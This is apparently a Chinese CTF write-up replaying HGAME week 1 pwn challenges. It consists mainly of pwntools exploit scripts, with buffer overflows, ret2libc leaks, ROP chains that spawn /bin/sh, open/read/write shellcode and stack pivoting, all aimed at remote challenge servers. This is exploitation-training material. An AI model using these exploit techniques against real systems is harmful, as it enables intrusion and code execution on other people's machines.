HGAME week1 复现

PWN:

easy_overflow:

exp:

from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])

io=remote("node2.anna.nssctf.cn",28949)

ret=0x40101a
payload=cyclic(0x18)+p64(ret)+p64(0x401176)
io.send(payload)
io.sendline(b"exec 1>&0")
io.interactive()



enter the pwn land:

注意变量会被输入覆盖
exp:

from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])

io=remote("node3.anna.nssctf.cn",28032)
# io=process("./service")
elf=ELF("./service")
libc=ELF("./libc1.so")

puts_got=elf.got[b"puts"]
puts_plt=elf.plt[b"puts"]
ret=0x40101a
pop_rdi_ret=0x401313
start=0x4010d0

payload=cyclic(0x28)+p32(1)+p32(0x2c)+p64(0)+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(start)
io.sendline(payload)
leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))
print("leak_addr:  "+hex(leak_addr))
libc_addr=leak_addr-libc.sym[b"puts"]
print("libc_addr:  "+hex(libc_addr))

sys_addr=libc_addr+libc.sym[b"system"]
str_bin_sh=libc_addr+next(libc.search(b"/bin/sh"))

payload=cyclic(0x28)+p32(1)+p32(0x2c)+p64(0)+p64(ret)+p64(pop_rdi_ret)+p64(str_bin_sh)+p64(sys_addr)
io.sendline(payload)

io.interactive()
# Gadgets information
# ============================================================
# 0x000000000040130c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x000000000040130e : pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000401310 : pop r14 ; pop r15 ; ret
# 0x0000000000401312 : pop r15 ; ret
# 0x000000000040130b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x000000000040130f : pop rbp ; pop r14 ; pop r15 ; ret
# 0x000000000040119d : pop rbp ; ret
# 0x0000000000401313 : pop rdi ; ret
# 0x0000000000401311 : pop rsi ; pop r15 ; ret
# 0x000000000040130d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x000000000040101a : ret

# Unique gadgets found: 11



simple_shellcode:

溢出长度不够,构造read读orw shellcode,注意shellcode起始地址
exp:

from pwn import *
context(log_level='debug',arch='amd64',os='linux',terminal=['tmux','splitw','-h'])


# io=process("./vuln")
io=remote("node3.anna.nssctf.cn",28491)

# gdb.attach(io)
# pause()

io.recvuntil(b"shellcode:\n")
shellcode=asm('''
    xor rdi,rdi
    mov rsi,0xCAFE0010
    syscall
    nop
''')
io.send(shellcode)
payload=asm(shellcraft.open("./flag")+shellcraft.read(3,0xCAFE0000,0x50)+shellcraft.write(1,0xCAFE0000,0x50))
io.send(payload)

io.interactive()



orw:

第一次输入泄露libc,第二次栈迁移劫持rsp寄存器,注意调栈问题=_=
exp:

from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])


# io=process("./vuln")
io=remote("node3.anna.nssctf.cn",28611)
elf=ELF("./vuln")
libc=ELF("./libc-2.31.so")

bss_addr=0x404300   #404220  
read_text=0x4012CF
main=0x4012f0
pop_rdi_ret=0x401393
ret=0x40101a
rsi_r15=0x401391
leave_ret=0x4012be
puts_plt=elf.plt[b"puts"]
puts_got=elf.got[b"puts"]

io.recvuntil(b"task.\n")
payload=cyclic(0x108)+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(main)
io.send(payload)

leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))
print("leak_addr: "+hex(leak_addr))
libc_addr=leak_addr-libc.sym[b"puts"]
print("libc_addr:  "+hex(libc_addr))
open_addr=libc_addr+libc.sym[b"open"]
write_addr=libc_addr+libc.sym[b"write"]
read_addr=elf.plt[b"read"]
pop_rdx_ret=0x142c92+libc_addr
pop_rsi_ret=0x2601f+libc_addr


# gdb.attach(io)
# pause()


io.recvuntil(b"task.\n")
payload=cyclic(0x100)+p64(bss_addr)+p64(read_text)
payload=payload.ljust(0x130,b"a")
io.send(payload)

payload=cyclic(0x100-0x8)+b"./flag\x00\x00"+p64(bss_addr+0x100+0x8+0x8)+p64(read_text)
payload=payload.ljust(0x130,b"a")
io.send(payload)

#open
payload=p64(pop_rdi_ret)+p64(0x4042f8)+p64(pop_rsi_ret)+p64(0)+p64(open_addr)
#read
payload+=p64(pop_rdi_ret)+p64(3)+p64(pop_rsi_ret)+p64(bss_addr+0x300)+p64(pop_rdx_ret)+p64(0x50)+p64(read_addr)
#write
payload+=p64(pop_rdi_ret)+p64(1)+p64(pop_rsi_ret)+p64(bss_addr+0x300)+p64(pop_rdx_ret)+p64(0x50)+p64(write_addr)

payload=payload.ljust(0x100,b"\x00")+p64(bss_addr+0x8)+p64(leave_ret)
io.send(payload)

io.interactive()

# Gadgets information
# ============================================================
# 0x00000000004012be : leave ; ret
# 0x000000000040138c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x000000000040138e : pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000401390 : pop r14 ; pop r15 ; ret
# 0x0000000000401392 : pop r15 ; ret
# 0x000000000040138b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x000000000040138f : pop rbp ; pop r14 ; pop r15 ; ret
# 0x000000000040117d : pop rbp ; ret
# 0x0000000000401393 : pop rdi ; ret
# 0x0000000000401391 : pop rsi ; pop r15 ; ret
# 0x000000000040138d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x000000000040101a : ret
# 0x00000000004012a8 : ret 0x2be

# Unique gadgets found: 13